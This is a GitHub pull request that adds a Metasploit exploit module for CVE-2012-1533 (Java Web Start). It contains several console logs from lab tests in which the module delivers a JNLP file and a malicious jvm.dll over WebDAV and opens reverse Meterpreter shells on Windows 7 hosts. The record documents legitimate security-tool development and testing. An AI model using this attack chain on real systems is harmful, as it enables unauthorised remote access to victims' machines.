Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2012-1533 #1948

Merged
merged 1 commit into from Jun 12, 2013
Merged

Add module for CVE-2012-1533 #1948

merged 1 commit into from Jun 12, 2013

Conversation

jvazquez-r7
Copy link
Contributor

All the credits go to Rh0, I just got his msf module, cleaned and did pr for him.

Webclient should be enabled on the w7 to use the webdav implementation on the module.

Tested on java 6 JRE 1.6.35 successfully:

msf exploit(java_ws_double_quote_clean) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:80/
[*] Server started.
msf exploit(java_ws_double_quote_clean) > [*] 192.168.172.215  java_ws_double_quote_clean - Request for "/" does not contain a sub-directory, redirecting to /WsgzmqneDkeG/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /WsgzmqneDkeG/" request from 192.168.172.215:49962
[*] 192.168.172.215  java_ws_double_quote_clean - Sending redirect to the JNLP file to 192.168.172.215:49962
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /WsgzmqneDkeG/sIPFsRRtEI.jnlp" request from 192.168.172.215:49962
[*] 192.168.172.215  java_ws_double_quote_clean - Sending JNLP to 192.168.172.215:49962...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /lwOofREESN4e4B/" request from 192.168.172.215:49970
[*] 192.168.172.215  java_ws_double_quote_clean - Sending redirect to the JNLP file to 192.168.172.215:49970
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /lwOofREESN4e4B/aWynQfZUJT.jnlp" request from 192.168.172.215:49970
[*] 192.168.172.215  java_ws_double_quote_clean - Sending JNLP to 192.168.172.215:49970...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to WebDAV "OPTIONS /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/lwOofREESN4e4B" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/jvm.dll" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL multistatus for /lwOofREESN4e4B/jvm.dll ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /lwOofREESN4e4B/jvm.dll" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL to 192.168.172.215:49978...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/lwOofREESN4e4B" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/lwOofREESN4e4B" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] Sending stage (751104 bytes) to 192.168.172.215
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.215:49979) at 2013-06-12 14:38:45 -0500

msf exploit(java_ws_double_quote_clean) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

@jvazquez-r7
Copy link
Contributor Author

Also tested successfully on JRE7u7... my log.... even when it doesn't verifies nothing indeed haha only your confident on me :P

msf exploit(java_ws_double_quote_clean) > [*] 192.168.172.215  java_ws_double_quote_clean - Request for "/" does not contain a sub-directory, redirecting to /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /nk726OVHDQJhm/" request from 192.168.172.215:50039
[*] 192.168.172.215  java_ws_double_quote_clean - Sending redirect to the JNLP file to 192.168.172.215:50039
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /nk726OVHDQJhm/mlqvZMOZbIVET.jnlp" request from 192.168.172.215:50039
[*] 192.168.172.215  java_ws_double_quote_clean - Sending JNLP to 192.168.172.215:50039...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to WebDAV "OPTIONS /nk726OVHDQJhm/" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /nk726OVHDQJhm/" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/nk726OVHDQJhm" does not contain a sub-directory, redirecting to /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /nk726OVHDQJhm/" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /nk726OVHDQJhm/jvm.dll" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL multistatus for /nk726OVHDQJhm/jvm.dll ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /nk726OVHDQJhm/jvm.dll" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL to 192.168.172.215:50047...
[*] Sending stage (751104 bytes) to 192.168.172.215
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.215:50048) at 2013-06-12 14:47:53 -0500

msf exploit(java_ws_double_quote_clean) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
sServer username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

@wchen-r7
Copy link
Contributor

Verified:

msf exploit(java_ws_double_quote) > [*] 10.6.0.132       java_ws_double_quote - Request for "/" does not contain a sub-directory, redirecting to /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Responding to "GET /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49414
[*] 10.6.0.132       java_ws_double_quote - Sending redirect to the JNLP file to 10.6.0.132:49414
[*] 10.6.0.132       java_ws_double_quote - Responding to "GET /dOKk8rdaXu1NPnb/POqAXlMPK.jnlp" request from 10.6.0.132:49414
[*] 10.6.0.132       java_ws_double_quote - Sending JNLP to 10.6.0.132:49414...
[*] 10.6.0.132       java_ws_double_quote - Responding to WebDAV "OPTIONS /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Received WebDAV "PROPFIND /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending directory multistatus for /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Request for "/dOKk8rdaXu1NPnb" does not contain a sub-directory, redirecting to /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Received WebDAV "PROPFIND /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending directory multistatus for /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Received WebDAV "PROPFIND /dOKk8rdaXu1NPnb/jvm.dll" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending DLL multistatus for /dOKk8rdaXu1NPnb/jvm.dll ...
[*] 10.6.0.132       java_ws_double_quote - Responding to "GET /dOKk8rdaXu1NPnb/jvm.dll" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending DLL to 10.6.0.132:49422...
[*] Sending stage (751104 bytes) to 10.6.0.132
[*] Meterpreter session 1 opened (10.6.0.142:4444 -> 10.6.0.132:49423) at 2013-06-12 16:17:40 -0500

wchen-r7 added a commit that referenced this pull request Jun 12, 2013
@wchen-r7
Land #1948 - Add module for CVE-2012-1533
ca85785
@wchen-r7 wchen-r7 merged commit afb2f83 into rapid7:master Jun 12, 2013
@jvazquez-r7 jvazquez-r7 deleted the java_ws_double_quote branch November 18, 2014 15:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7